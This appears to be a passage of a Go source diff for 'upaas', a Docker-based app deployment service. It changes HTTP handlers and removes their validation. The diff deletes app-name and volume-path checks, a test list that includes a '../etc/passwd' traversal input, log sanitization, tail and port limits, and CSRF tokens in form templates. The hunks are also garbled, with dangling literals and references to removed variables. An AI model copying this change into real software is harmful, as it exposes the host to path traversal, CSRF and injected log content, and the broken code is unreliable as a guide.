 func TestAPIRejectsUnauthenticated(t *testing.T) {
 	t.Parallel()
 	tc := setupTestHandlers(t)
 	r := apiRouter(tc)
 	req := httptest.NewRequest(http.MethodGet, "/api/v1/apps", nil)
 	rr := httptest.NewRecorder()
 	r.ServeHTTP(rr, req)
 	assert.Equal(t, http.StatusUnauthorized, rr.Code)
 }
 func TestAPIWhoAmI(t *testing.T) {
 	t.Parallel()
 	tc, cookies := setupAPITest(t)
 	rr := apiGet(t, tc, cookies, "/api/v1/whoami")
 	assert.Equal(t, http.StatusOK, rr.Code)
 	var resp map[string]any
 	require.NoError(t, json.Unmarshal(rr.Body.Bytes(), &resp))
 	assert.Equal(t, "admin", resp["username"])
 }
 func TestAPIListAppsEmpty(t *testing.T) {
 	t.Parallel()
 	tc, cookies := setupAPITest(t)
 	rr := apiGet(t, tc, cookies, "/api/v1/apps")
 	assert.Equal(t, http.StatusOK, rr.Code)
 	var apps []any
 	require.NoError(t, json.Unmarshal(rr.Body.Bytes(), &apps))
 	assert.Empty(t, apps)
 }
 func TestAPIGetApp(t *testing.T) {
 	t.Parallel()
 	tc, cookies := setupAPITest(t)
 	created, err := tc.appSvc.CreateApp(t.Context(), app.CreateAppInput{
 		Name:    "my-app",
 		RepoURL: "https://github.com/example/repo",
 	})
 	require.NoError(t, err)
 	rr := apiGet(t, tc, cookies, "/api/v1/apps/"+created.ID)
 	assert.Equal(t, http.StatusOK, rr.Code)
 	var resp map[string]any
 	require.NoError(t, json.Unmarshal(rr.Body.Bytes(), &resp))
 	assert.Equal(t, "my-app", resp["name"])
 }
 func TestAPIGetAppNotFound(t *testing.T) {
 	t.Parallel()
 	tc, cookies := setupAPITest(t)
 	rr := apiGet(t, tc, cookies, "/api/v1/apps/nonexistent")
 	assert.Equal(t, http.StatusNotFound, rr.Code)
 }
 func TestAPIListDeployments(t *testing.T) {
 	t.Parallel()
 	tc, cookies := setupAPITest(t)
 	created, err := tc.appSvc.CreateApp(t.Context(), app.CreateAppInput{
 		Name:    "deploy-app",
 		RepoURL: "https://github.com/example/repo",
 	})
 	require.NoError(t, err)
 	rr := apiGet(t, tc, cookies, "/api/v1/apps/"+created.ID+"/deployments")
 	assert.Equal(t, http.StatusOK, rr.Code)
 	var deployments []any
 	require.NoError(t, json.Unmarshal(rr.Body.Bytes(), &deployments))
 	assert.Empty(t, deployments)
 }
--- a/internal/handlers/app.go
+++ b/internal/handlers/app.go
@@ -4,8 +4,6 @@ import (
 	"context"
 	"database/sql"
 	"encoding/json"
 	"errors"
 	"fmt"
 	"net/http"
 	"os"
 	"path/filepath"
@@ -15,9 +13,9 @@ import (
 	"github.com/go-chi/chi/v5"
-	"sneak.berlin/go/upaas/internal/models"
+	"git.eeqj.de/sneak/upaas/internal/models"
-	"sneak.berlin/go/upaas/internal/service/app"
+	"git.eeqj.de/sneak/upaas/internal/service/app"
-	"sneak.berlin/go/upaas/templates"
+	"git.eeqj.de/sneak/upaas/templates"
 )
 const (
@@ -31,15 +29,19 @@ const (
 func (h *Handlers) HandleAppNew() http.HandlerFunc {
 	tmpl := templates.GetParsed()
-	return func(writer http.ResponseWriter, request *http.Request) {
+	return func(writer http.ResponseWriter, _ *http.Request) {
-		data := h.addGlobals(map[string]any{}, request)
+		data := h.addGlobals(map[string]any{})
-		h.renderTemplate(writer, tmpl, "app_new.html", data)
+		err := tmpl.ExecuteTemplate(writer, "app_new.html", data)
 		if err != nil {
 			h.log.Error("template execution failed", "error", err)
 			http.Error(writer, "Internal Server Error", http.StatusInternalServerError)
 		}
 	}
 }
 // HandleAppCreate handles app creation.
-func (h *Handlers) HandleAppCreate() http.HandlerFunc { //nolint:funlen // validation adds necessary length
+func (h *Handlers) HandleAppCreate() http.HandlerFunc {
 	tmpl := templates.GetParsed()
 	return func(writer http.ResponseWriter, request *http.Request) {
@@ -54,39 +56,17 @@ func (h *Handlers) HandleAppCreate() http.HandlerFunc { //nolint:funlen // valid
 		repoURL := request.FormValue("repo_url")
 		branch := request.FormValue("branch")
 		dockerfilePath := request.FormValue("dockerfile_path")
 		dockerNetwork := request.FormValue("docker_network")
 		ntfyTopic := request.FormValue("ntfy_topic")
 		slackWebhook := request.FormValue("slack_webhook")
-		data := h.addGlobals(map[string]any{
+		data := map[string]any{
 			"Name":           name,
 			"RepoURL":        repoURL,
 			"Branch":         branch,
 			"DockerfilePath": dockerfilePath,
-			"DockerNetwork":  dockerNetwork,
+		}
 			"NtfyTopic":      ntfyTopic,
 			"SlackWebhook":   slackWebhook,
 		}, request)
 		if name == "" || repoURL == "" {
 			data["Error"] = "Name and repository URL are required"
-			h.renderTemplate(writer, tmpl, "app_new.html", data)
+			_ = tmpl.ExecuteTemplate(writer, "app_new.html", data)
 			return
 		}
 		nameErr := validateAppName(name)
 		if nameErr != nil {
 			data["Error"] = "Invalid app name: " + nameErr.Error()
 			h.renderTemplate(writer, tmpl, "app_new.html", data)
 			return
 		}
 		repoURLErr := validateRepoURL(repoURL)
 		if repoURLErr != nil {
 			data["Error"] = "Invalid repository URL: " + repoURLErr.Error()
 			h.renderTemplate(writer, tmpl, "app_new.html", data)
 			return
 		}
@@ -106,15 +86,12 @@ func (h *Handlers) HandleAppCreate() http.HandlerFunc { //nolint:funlen // valid
 				RepoURL:        repoURL,
 				Branch:         branch,
 				DockerfilePath: dockerfilePath,
 				DockerNetwork:  dockerNetwork,
 				NtfyTopic:      ntfyTopic,
 				SlackWebhook:   slackWebhook,
 			},
 		)
 		if createErr != nil {
 			h.log.Error("failed to create app", "error", createErr)
 			data["Error"] = "Failed to create app: " + createErr.Error()
-			h.renderTemplate(writer, tmpl, "app_new.html", data)
+			_ = tmpl.ExecuteTemplate(writer, "app_new.html", data)
 			return
 		}
@@ -173,9 +150,13 @@ func (h *Handlers) HandleAppDetail() http.HandlerFunc {
 			"WebhookURL":       webhookURL,
 			"DeployKey":        deployKey,
 			"Success":          request.URL.Query().Get("success"),
-		}, request)
+		})
-		h.renderTemplate(writer, tmpl, "app_detail.html", data)
+		err := tmpl.ExecuteTemplate(writer, "app_detail.html", data)
 		if err != nil {
 			h.log.Error("template execution failed", "error", err)
 			http.Error(writer, "Internal Server Error", http.StatusInternalServerError)
 		}
 	}
 }
@@ -202,14 +183,18 @@ func (h *Handlers) HandleAppEdit() http.HandlerFunc {
 		data := h.addGlobals(map[string]any{
 			"App": application,
-		}, request)
+		})
-		h.renderTemplate(writer, tmpl, "app_edit.html", data)
+		err := tmpl.ExecuteTemplate(writer, "app_edit.html", data)
 		if err != nil {
 			h.log.Error("template execution failed", "error", err)
 			http.Error(writer, "Internal Server Error", http.StatusInternalServerError)
 		}
 	}
 }
 // HandleAppUpdate handles app updates.
-func (h *Handlers) HandleAppUpdate() http.HandlerFunc { //nolint:funlen // validation adds necessary length
+func (h *Handlers) HandleAppUpdate() http.HandlerFunc {
 	tmpl := templates.GetParsed()
 	return func(writer http.ResponseWriter, request *http.Request) {
@@ -229,31 +214,7 @@ func (h *Handlers) HandleAppUpdate() http.HandlerFunc { //nolint:funlen // valid
 			return
 		}
-		newName := request.FormValue("name")
+		application.Name = request.FormValue("name")
 		nameErr := validateAppName(newName)
 		if nameErr != nil {
 			data := h.addGlobals(map[string]any{
 				"App":   application,
 				"Error": "Invalid app name: " + nameErr.Error(),
 			}, request)
 			h.renderTemplate(writer, tmpl, "app_edit.html", data)
 			return
 		}
 		repoURLErr := validateRepoURL(request.FormValue("repo_url"))
 		if repoURLErr != nil {
 			data := h.addGlobals(map[string]any{
 				"App":   application,
 				"Error": "Invalid repository URL: " + repoURLErr.Error(),
 			}, request)
 			h.renderTemplate(writer, tmpl, "app_edit.html", data)
 			return
 		}
 		application.Name = newName
 		application.RepoURL = request.FormValue("repo_url")
 		application.Branch = request.FormValue("branch")
 		application.DockerfilePath = request.FormValue("dockerfile_path")
@@ -280,11 +241,11 @@ func (h *Handlers) HandleAppUpdate() http.HandlerFunc { //nolint:funlen // valid
 		if saveErr != nil {
 			h.log.Error("failed to update app", "error", saveErr)
-			data := h.addGlobals(map[string]any{
+			data := map[string]any{
 				"App":   application,
 				"Error": "Failed to update app",
-			}, request)
+			}
-			h.renderTemplate(writer, tmpl, "app_edit.html", data)
+			_ = tmpl.ExecuteTemplate(writer, "app_edit.html", data)
 			return
 		}
@@ -294,33 +255,6 @@ func (h *Handlers) HandleAppUpdate() http.HandlerFunc { //nolint:funlen // valid
 	}
 }
 // cleanupContainer stops and removes the Docker container for the given app.
 func (h *Handlers) cleanupContainer(ctx context.Context, appID, appName string) {
 	containerInfo, containerErr := h.docker.FindContainerByAppID(ctx, appID)
 	if containerErr != nil || containerInfo == nil {
 		return
 	}
 	if containerInfo.Running {
 		stopErr := h.docker.StopContainer(ctx, containerInfo.ID)
 		if stopErr != nil {
 			h.log.Error("failed to stop container during app deletion",
 				"error", stopErr, "app", appName,
 				"container", containerInfo.ID)
 		}
 	}
 	removeErr := h.docker.RemoveContainer(ctx, containerInfo.ID, true)
 	if removeErr != nil {
 		h.log.Error("failed to remove container during app deletion",
 			"error", removeErr, "app", appName,
 			"container", containerInfo.ID)
 	} else {
 		h.log.Info("removed container during app deletion",
 			"app", appName, "container", containerInfo.ID)
 	}
 }
 // HandleAppDelete handles app deletion.
 func (h *Handlers) HandleAppDelete() http.HandlerFunc {
 	return func(writer http.ResponseWriter, request *http.Request) {
@@ -333,9 +267,6 @@ func (h *Handlers) HandleAppDelete() http.HandlerFunc {
 			return
 		}
 		// Stop and remove the Docker container before deleting the DB record
 		h.cleanupContainer(request.Context(), appID, application.Name)
 		deleteErr := application.Delete(request.Context())
 		if deleteErr != nil {
 			h.log.Error("failed to delete app", "error", deleteErr)
@@ -365,7 +296,7 @@ func (h *Handlers) HandleAppDeploy() http.HandlerFunc {
 		deployCtx := context.WithoutCancel(request.Context())
 		go func(ctx context.Context, appToDeploy *models.App) {
-			deployErr := h.deploy.Deploy(ctx, appToDeploy, nil, false)
+			deployErr := h.deploy.Deploy(ctx, appToDeploy, nil)
 			if deployErr != nil {
 				h.log.Error(
 					"deployment failed",
@@ -384,56 +315,6 @@ func (h *Handlers) HandleAppDeploy() http.HandlerFunc {
 	}
 }
 // HandleCancelDeploy cancels an in-progress deployment for an app.
 func (h *Handlers) HandleCancelDeploy() http.HandlerFunc {
 	return func(writer http.ResponseWriter, request *http.Request) {
 		appID := chi.URLParam(request, "id")
 		application, findErr := models.FindApp(request.Context(), h.db, appID)
 		if findErr != nil || application == nil {
 			http.NotFound(writer, request)
 			return
 		}
 		cancelled := h.deploy.CancelDeploy(application.ID)
 		if cancelled {
 			h.log.Info("deployment cancelled by user", "app", application.Name)
 		}
 		http.Redirect(
 			writer,
 			request,
 			"/apps/"+application.ID,
 			http.StatusSeeOther,
 		)
 	}
 }
 // HandleAppRollback handles rolling back to the previous deployment image.
 func (h *Handlers) HandleAppRollback() http.HandlerFunc {
 	return func(writer http.ResponseWriter, request *http.Request) {
 		appID := chi.URLParam(request, "id")
 		application, findErr := models.FindApp(request.Context(), h.db, appID)
 		if findErr != nil || application == nil {
 			http.NotFound(writer, request)
 			return
 		}
 		rollbackErr := h.deploy.Rollback(request.Context(), application)
 		if rollbackErr != nil {
 			h.log.Error("rollback failed", "error", rollbackErr, "app", application.Name)
 			http.Redirect(writer, request, "/apps/"+application.ID, http.StatusSeeOther)
 			return
 		}
 		http.Redirect(writer, request, "/apps/"+application.ID+"?success=rolledback", http.StatusSeeOther)
 	}
 }
 // HandleAppDeployments returns the deployments history handler.
 func (h *Handlers) HandleAppDeployments() http.HandlerFunc {
 	tmpl := templates.GetParsed()
@@ -456,36 +337,18 @@ func (h *Handlers) HandleAppDeployments() http.HandlerFunc {
 		data := h.addGlobals(map[string]any{
 			"App":         application,
 			"Deployments": deployments,
-		}, request)
+		})
-		h.renderTemplate(writer, tmpl, "deployments.html", data)
+		err := tmpl.ExecuteTemplate(writer, "deployments.html", data)
 		if err != nil {
 			h.log.Error("template execution failed", "error", err)
 			http.Error(writer, "Internal Server Error", http.StatusInternalServerError)
 		}
 	}
 }
-// DefaultLogTail is the default number of log lines to fetch.
+// defaultLogTail is the default number of log lines to fetch.
-const DefaultLogTail = "500"
+const defaultLogTail = "500"
 // maxLogTail is the maximum allowed value for the tail parameter.
 const maxLogTail = 500
 // SanitizeTail validates and clamps the tail query parameter.
 // It returns a numeric string clamped to maxLogTail, or the default if invalid.
 func SanitizeTail(raw string) string {
 	if raw == "" {
 		return DefaultLogTail
 	}
 	n, err := strconv.Atoi(raw)
 	if err != nil || n < 1 {
 		return DefaultLogTail
 	}
 	if n > maxLogTail {
 		n = maxLogTail
 	}
 	return strconv.Itoa(n)
 }
 // HandleAppLogs returns the container logs handler.
 func (h *Handlers) HandleAppLogs() http.HandlerFunc {
@@ -508,7 +371,10 @@ func (h *Handlers) HandleAppLogs() http.HandlerFunc {
 			return
 		}
-		tail := SanitizeTail(request.URL.Query().Get("tail"))
+		tail := request.URL.Query().Get("tail")
 		if tail == "" {
 			tail = defaultLogTail
 		}
 		logs, logsErr := h.docker.ContainerLogs(
 			request.Context(),
@@ -527,7 +393,7 @@ func (h *Handlers) HandleAppLogs() http.HandlerFunc {
 			return
 		}
-		_, _ = writer.Write([]byte(SanitizeLogs(logs))) // #nosec G705 -- logs sanitized, Content-Type is text/plain
+		_, _ = writer.Write([]byte(logs))
 	}
 }
@@ -562,7 +428,7 @@ func (h *Handlers) HandleDeploymentLogsAPI() http.HandlerFunc {
 		logs := ""
 		if deployment.Logs.Valid {
-			logs = SanitizeLogs(deployment.Logs.String)
+			logs = deployment.Logs.String
 		}
 		response := map[string]any{
@@ -609,8 +475,8 @@ func (h *Handlers) HandleDeploymentLogDownload() http.HandlerFunc {
 			return
 		}
-		// Check if file exists — logPath is constructed internally, not from user input
+		// Check if file exists
-		_, err := os.Stat(logPath) // #nosec G703 -- path from internal GetLogFilePath, not user input
+		_, err := os.Stat(logPath)
 		if os.IsNotExist(err) {
 			http.NotFound(writer, request)
@@ -689,7 +555,7 @@ func (h *Handlers) HandleContainerLogsAPI() http.HandlerFunc {
 		}
 		response := map[string]any{
-			"logs":   SanitizeLogs(logs),
+			"logs":   logs,
 			"status": status,
 		}
@@ -925,7 +791,7 @@ func (h *Handlers) HandleEnvVarAdd() http.HandlerFunc {
 func (h *Handlers) HandleEnvVarDelete() http.HandlerFunc {
 	return func(writer http.ResponseWriter, request *http.Request) {
 		appID := chi.URLParam(request, "id")
-		envVarIDStr := chi.URLParam(request, "varID")
+		envVarIDStr := chi.URLParam(request, "envID")
 		envVarID, parseErr := strconv.ParseInt(envVarIDStr, 10, 64)
 		if parseErr != nil {
@@ -1031,14 +897,6 @@ func (h *Handlers) HandleVolumeAdd() http.HandlerFunc {
 			return
 		}
 		pathErr := validateVolumePaths(hostPath, containerPath)
 		if pathErr != nil {
 			h.log.Error("invalid volume path", "error", pathErr)
 			http.Redirect(writer, request, "/apps/"+application.ID, http.StatusSeeOther)
 			return
 		}
 		volume := models.NewVolume(h.db)
 		volume.AppID = application.ID
 		volume.HostPath = hostPath
@@ -1137,12 +995,7 @@ func parsePortValues(hostPortStr, containerPortStr string) (int, int, bool) {
 	hostPort, hostErr := strconv.Atoi(hostPortStr)
 	containerPort, containerErr := strconv.Atoi(containerPortStr)
-	const maxPort = 65535
+	if hostErr != nil || containerErr != nil || hostPort <= 0 || containerPort <= 0 {
 	invalid := hostErr != nil || containerErr != nil ||
 		hostPort <= 0 || containerPort <= 0 ||
 		hostPort > maxPort || containerPort > maxPort
 	if invalid {
 		return 0, 0, false
 	}
@@ -1178,207 +1031,6 @@ func (h *Handlers) HandlePortDelete() http.HandlerFunc {
 	}
 }
 // ErrVolumePathEmpty is returned when a volume path is empty.
 var ErrVolumePathEmpty = errors.New("path must not be empty")
 // ErrVolumePathNotAbsolute is returned when a volume path is not absolute.
 var ErrVolumePathNotAbsolute = errors.New("path must be absolute")
 // ErrVolumePathNotClean is returned when a volume path is not clean.
 var ErrVolumePathNotClean = errors.New("path must be clean")
 // ValidateVolumePath checks that a path is absolute and clean.
 func ValidateVolumePath(p string) error {
 	if p == "" {
 		return ErrVolumePathEmpty
 	}
 	if !filepath.IsAbs(p) {
 		return ErrVolumePathNotAbsolute
 	}
 	cleaned := filepath.Clean(p)
 	if cleaned != p {
 		return fmt.Errorf("%w (expected %q)", ErrVolumePathNotClean, cleaned)
 	}
 	return nil
 }
 // HandleEnvVarEdit handles editing an existing environment variable.
 func (h *Handlers) HandleEnvVarEdit() http.HandlerFunc {
 	return func(writer http.ResponseWriter, request *http.Request) {
 		appID := chi.URLParam(request, "id")
 		envVarIDStr := chi.URLParam(request, "varID")
 		envVarID, parseErr := strconv.ParseInt(envVarIDStr, 10, 64)
 		if parseErr != nil {
 			http.NotFound(writer, request)
 			return
 		}
 		envVar, findErr := models.FindEnvVar(request.Context(), h.db, envVarID)
 		if findErr != nil || envVar == nil || envVar.AppID != appID {
 			http.NotFound(writer, request)
 			return
 		}
 		formErr := request.ParseForm()
 		if formErr != nil {
 			http.Error(writer, "Bad Request", http.StatusBadRequest)
 			return
 		}
 		key := request.FormValue("key")
 		value := request.FormValue("value")
 		if key == "" || value == "" {
 			http.Redirect(writer, request, "/apps/"+appID, http.StatusSeeOther)
 			return
 		}
 		envVar.Key = key
 		envVar.Value = value
 		saveErr := envVar.Save(request.Context())
 		if saveErr != nil {
 			h.log.Error("failed to update env var", "error", saveErr)
 		}
 		http.Redirect(
 			writer,
 			request,
 			"/apps/"+appID+"?success=env-updated",
 			http.StatusSeeOther,
 		)
 	}
 }
 // HandleLabelEdit handles editing an existing label.
 func (h *Handlers) HandleLabelEdit() http.HandlerFunc {
 	return func(writer http.ResponseWriter, request *http.Request) {
 		appID := chi.URLParam(request, "id")
 		labelIDStr := chi.URLParam(request, "labelID")
 		labelID, parseErr := strconv.ParseInt(labelIDStr, 10, 64)
 		if parseErr != nil {
 			http.NotFound(writer, request)
 			return
 		}
 		label, findErr := models.FindLabel(request.Context(), h.db, labelID)
 		if findErr != nil || label == nil || label.AppID != appID {
 			http.NotFound(writer, request)
 			return
 		}
 		formErr := request.ParseForm()
 		if formErr != nil {
 			http.Error(writer, "Bad Request", http.StatusBadRequest)
 			return
 		}
 		key := request.FormValue("key")
 		value := request.FormValue("value")
 		if key == "" || value == "" {
 			http.Redirect(writer, request, "/apps/"+appID, http.StatusSeeOther)
 			return
 		}
 		label.Key = key
 		label.Value = value
 		saveErr := label.Save(request.Context())
 		if saveErr != nil {
 			h.log.Error("failed to update label", "error", saveErr)
 		}
 		http.Redirect(writer, request, "/apps/"+appID, http.StatusSeeOther)
 	}
 }
 // HandleVolumeEdit handles editing an existing volume mount.
 func (h *Handlers) HandleVolumeEdit() http.HandlerFunc {
 	return func(writer http.ResponseWriter, request *http.Request) {
 		appID := chi.URLParam(request, "id")
 		volumeIDStr := chi.URLParam(request, "volumeID")
 		volumeID, parseErr := strconv.ParseInt(volumeIDStr, 10, 64)
 		if parseErr != nil {
 			http.NotFound(writer, request)
 			return
 		}
 		volume, findErr := models.FindVolume(request.Context(), h.db, volumeID)
 		if findErr != nil || volume == nil || volume.AppID != appID {
 			http.NotFound(writer, request)
 			return
 		}
 		formErr := request.ParseForm()
 		if formErr != nil {
 			http.Error(writer, "Bad Request", http.StatusBadRequest)
 			return
 		}
 		hostPath := request.FormValue("host_path")
 		containerPath := request.FormValue("container_path")
 		readOnly := request.FormValue("readonly") == "1"
 		if hostPath == "" || containerPath == "" {
 			http.Redirect(writer, request, "/apps/"+appID, http.StatusSeeOther)
 			return
 		}
 		pathErr := validateVolumePaths(hostPath, containerPath)
 		if pathErr != nil {
 			h.log.Error("invalid volume path", "error", pathErr)
 			http.Redirect(writer, request, "/apps/"+appID, http.StatusSeeOther)
 			return
 		}
 		volume.HostPath = hostPath
 		volume.ContainerPath = containerPath
 		volume.ReadOnly = readOnly
 		saveErr := volume.Save(request.Context())
 		if saveErr != nil {
 			h.log.Error("failed to update volume", "error", saveErr)
 		}
 		http.Redirect(writer, request, "/apps/"+appID, http.StatusSeeOther)
 	}
 }
 // validateVolumePaths validates both host and container paths for a volume.
 func validateVolumePaths(hostPath, containerPath string) error {
 	hostErr := ValidateVolumePath(hostPath)
 	if hostErr != nil {
 		return fmt.Errorf("host path: %w", hostErr)
 	}
 	containerErr := ValidateVolumePath(containerPath)
 	if containerErr != nil {
 		return fmt.Errorf("container path: %w", containerErr)
 	}
 	return nil
 }
 // formatDeployKey formats an SSH public key with a descriptive comment.
 // Format: ssh-ed25519 AAAA... upaas_2025-01-15_myapp
 func formatDeployKey(pubKey string, createdAt time.Time, appName string) string {
--- a/internal/handlers/app_name_validation.go
+++ b/internal/handlers/app_name_validation.go
@@ -1,44 +0,0 @@
 package handlers
 import (
 	"errors"
 	"regexp"
 	"strconv"
 )
 const (
 	// appNameMinLength is the minimum allowed length for an app name.
 	appNameMinLength = 2
 	// appNameMaxLength is the maximum allowed length for an app name.
 	appNameMaxLength = 63
 )
 // validAppNameRe matches names containing only lowercase alphanumeric characters and
 // hyphens, starting and ending with an alphanumeric character.
 var validAppNameRe = regexp.MustCompile(`^[a-z0-9][a-z0-9-]*[a-z0-9]$`)
 // validateAppName checks that the given app name is safe for use in Docker
 // container names, image tags, and file system paths.
 var (
 	errAppNameLength = errors.New(
 		"app name must be between " +
 			strconv.Itoa(appNameMinLength) + " and " +
 			strconv.Itoa(appNameMaxLength) + " characters",
 	)
 	errAppNamePattern = errors.New(
 		"app name must contain only lowercase letters, numbers, " +
 			"and hyphens, and must start and end with a letter or number",
 	)
 )
 func validateAppName(name string) error {
 	if len(name) < appNameMinLength || len(name) > appNameMaxLength {
 		return errAppNameLength
 	}
 	if !validAppNameRe.MatchString(name) {
 		return errAppNamePattern
 	}
 	return nil
 }
--- a/internal/handlers/app_name_validation_test.go
+++ b/internal/handlers/app_name_validation_test.go
@@ -1,48 +0,0 @@
 package handlers //nolint:testpackage // testing unexported validateAppName
 import (
 	"testing"
 )
 func TestValidateAppName(t *testing.T) {
 	t.Parallel()
 	tests := []struct {
 		name    string
 		input   string
 		wantErr bool
 	}{
 		{"valid simple", "myapp", false},
 		{"valid with hyphen", "my-app", false},
 		{"valid with numbers", "app123", false},
 		{"valid two chars", "ab", false},
 		{"valid complex", "my-cool-app-v2", false},
 		{"valid all numbers", "123", false},
 		{"empty", "", true},
 		{"single char", "a", true},
 		{"too long", "a" + string(make([]byte, 63)), true},
 		{"exactly 63 chars", "a23456789012345678901234567890123456789012345678901234567890123", false},
 		{"64 chars", "a234567890123456789012345678901234567890123456789012345678901234", true},
 		{"uppercase", "MyApp", true},
 		{"spaces", "my app", true},
 		{"starts with hyphen", "-myapp", true},
 		{"ends with hyphen", "myapp-", true},
 		{"underscore", "my_app", true},
 		{"dot", "my.app", true},
 		{"slash", "my/app", true},
 		{"path traversal", "../etc/passwd", true},
 		{"special chars", "app@name!", true},
 		{"unicode", "appñame", true},
 	}
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
 			t.Parallel()
 			err := validateAppName(tt.input)
 			if (err != nil) != tt.wantErr {
 				t.Errorf("validateAppName(%q) error = %v, wantErr %v", tt.input, err, tt.wantErr)
 			}
 		})
 	}
 }
--- a/internal/handlers/auth.go
+++ b/internal/handlers/auth.go
@@ -3,17 +3,21 @@ package handlers
 import (
 	"net/http"
-	"sneak.berlin/go/upaas/templates"
+	"git.eeqj.de/sneak/upaas/templates"
 )
 // HandleLoginGET returns the login page handler.
 func (h *Handlers) HandleLoginGET() http.HandlerFunc {
 	tmpl := templates.GetParsed()
-	return func(writer http.ResponseWriter, request *http.Request) {
+	return func(writer http.ResponseWriter, _ *http.Request) {
-		data := h.addGlobals(map[string]any{}, request)
+		data := h.addGlobals(map[string]any{})
-		h.renderTemplate(writer, tmpl, "login.html", data)
+		err := tmpl.ExecuteTemplate(writer, "login.html", data)
 		if err != nil {
 			h.log.Error("template execution failed", "error", err)
 			http.Error(writer, "Internal Server Error", http.StatusInternalServerError)
 		}
 	}
 }
@@ -34,11 +38,11 @@ func (h *Handlers) HandleLoginPOST() http.HandlerFunc {
 		data := h.addGlobals(map[string]any{
 			"Username": username,
-		}, request)
+		})
 		if username == "" || password == "" {
 			data["Error"] = "Username and password are required"
-			h.renderTemplate(writer, tmpl, "login.html", data)
+			_ = tmpl.ExecuteTemplate(writer, "login.html", data)
 			return
 		}
@@ -46,7 +50,7 @@ func (h *Handlers) HandleLoginPOST() http.HandlerFunc {
 		user, authErr := h.auth.Authenticate(request.Context(), username, password)
 		if authErr != nil {
 			data["Error"] = "Invalid username or password"
-			h.renderTemplate(writer, tmpl, "login.html", data)
+			_ = tmpl.ExecuteTemplate(writer, "login.html", data)
 			return
 		}
@@ -56,7 +60,7 @@ func (h *Handlers) HandleLoginPOST() http.HandlerFunc {
 			h.log.Error("failed to create session", "error", sessionErr)
 			data["Error"] = "Failed to create session"
-			h.renderTemplate(writer, tmpl, "login.html", data)
+			_ = tmpl.ExecuteTemplate(writer, "login.html", data)
 			return
 		}
--- a/internal/handlers/dashboard.go
+++ b/internal/handlers/dashboard.go
@@ -4,8 +4,8 @@ import (
 	"net/http"
 	"time"
-	"sneak.berlin/go/upaas/internal/models"
+	"git.eeqj.de/sneak/upaas/internal/models"
-	"sneak.berlin/go/upaas/templates"
+	"git.eeqj.de/sneak/upaas/templates"
 )
 // AppStats holds deployment statistics for an app.
@@ -67,8 +67,12 @@ func (h *Handlers) HandleDashboard() http.HandlerFunc {
 		data := h.addGlobals(map[string]any{
 			"AppStats": appStats,
-		}, request)
+		})
-		h.renderTemplate(writer, tmpl, "dashboard.html", data)
+		execErr := tmpl.ExecuteTemplate(writer, "dashboard.html", data)
 		if execErr != nil {
 			h.log.Error("template execution failed", "error", execErr)
 			http.Error(writer, "Internal Server Error", http.StatusInternalServerError)
 		}
 	}
 }
--- a/internal/handlers/export_test.go
+++ b/internal/handlers/export_test.go
@@ -1,6 +0,0 @@
 package handlers
 // ValidateRepoURLForTest exports validateRepoURL for testing.
 func ValidateRepoURLForTest(repoURL string) error {
 	return validateRepoURL(repoURL)
 }
--- a/internal/handlers/handlers.go
+++ b/internal/handlers/handlers.go
@@ -2,24 +2,21 @@
 package handlers
 import (
 	"bytes"
 	"encoding/json"
 	"log/slog"
 	"net/http"
 	"github.com/gorilla/csrf"
 	"go.uber.org/fx"
-	"sneak.berlin/go/upaas/internal/database"
+	"git.eeqj.de/sneak/upaas/internal/database"
-	"sneak.berlin/go/upaas/internal/docker"
+	"git.eeqj.de/sneak/upaas/internal/docker"
-	"sneak.berlin/go/upaas/internal/globals"
+	"git.eeqj.de/sneak/upaas/internal/globals"
-	"sneak.berlin/go/upaas/internal/healthcheck"
+	"git.eeqj.de/sneak/upaas/internal/healthcheck"
-	"sneak.berlin/go/upaas/internal/logger"
+	"git.eeqj.de/sneak/upaas/internal/logger"
-	"sneak.berlin/go/upaas/internal/service/app"
+	"git.eeqj.de/sneak/upaas/internal/service/app"
-	"sneak.berlin/go/upaas/internal/service/auth"
+	"git.eeqj.de/sneak/upaas/internal/service/auth"
-	"sneak.berlin/go/upaas/internal/service/deploy"
+	"git.eeqj.de/sneak/upaas/internal/service/deploy"
-	"sneak.berlin/go/upaas/internal/service/webhook"
+	"git.eeqj.de/sneak/upaas/internal/service/webhook"
 	"sneak.berlin/go/upaas/templates"
 )
 // Params contains dependencies for Handlers.
@@ -67,43 +64,14 @@ func New(_ fx.Lifecycle, params Params) (*Handlers, error) {
 	}, nil
 }
-// addGlobals adds version info and CSRF token to template data map.
+// addGlobals adds version info to template data map.
-func (h *Handlers) addGlobals(
+func (h *Handlers) addGlobals(data map[string]any) map[string]any {
 	data map[string]any,
 	request *http.Request,
 ) map[string]any {
 	data["Version"] = h.globals.Version
 	data["Appname"] = h.globals.Appname
 	if request != nil {
 		data["CSRFField"] = csrf.TemplateField(request)
 	}
 	return data
 }
 // renderTemplate executes the named template into a buffer first, then writes
 // to the ResponseWriter only on success. This prevents partial/corrupt HTML
 // responses when template execution fails partway through.
 func (h *Handlers) renderTemplate(
 	writer http.ResponseWriter,
 	tmpl *templates.TemplateExecutor,
 	name string,
 	data any,
 ) {
 	var buf bytes.Buffer
 	err := tmpl.ExecuteTemplate(&buf, name, data)
 	if err != nil {
 		h.log.Error("template execution failed", "error", err)
 		http.Error(writer, "Internal Server Error", http.StatusInternalServerError)
 		return
 	}
 	_, _ = buf.WriteTo(writer)
 }
 func (h *Handlers) respondJSON(
 	writer http.ResponseWriter,
 	_ *http.Request,
--- a/internal/handlers/handlers_test.go
+++ b/internal/handlers/handlers_test.go
@@ -15,21 +15,20 @@ import (
 	"github.com/stretchr/testify/require"
 	"go.uber.org/fx"
-	"sneak.berlin/go/upaas/internal/models"
+	"git.eeqj.de/sneak/upaas/internal/models"
-	"sneak.berlin/go/upaas/internal/config"
+	"git.eeqj.de/sneak/upaas/internal/config"
-	"sneak.berlin/go/upaas/internal/database"
+	"git.eeqj.de/sneak/upaas/internal/database"
-	"sneak.berlin/go/upaas/internal/docker"
+	"git.eeqj.de/sneak/upaas/internal/docker"
-	"sneak.berlin/go/upaas/internal/globals"
+	"git.eeqj.de/sneak/upaas/internal/globals"
-	"sneak.berlin/go/upaas/internal/handlers"
+	"git.eeqj.de/sneak/upaas/internal/handlers"
-	"sneak.berlin/go/upaas/internal/healthcheck"
+	"git.eeqj.de/sneak/upaas/internal/healthcheck"
-	"sneak.berlin/go/upaas/internal/logger"
+	"git.eeqj.de/sneak/upaas/internal/logger"
-	"sneak.berlin/go/upaas/internal/middleware"
+	"git.eeqj.de/sneak/upaas/internal/service/app"
-	"sneak.berlin/go/upaas/internal/service/app"
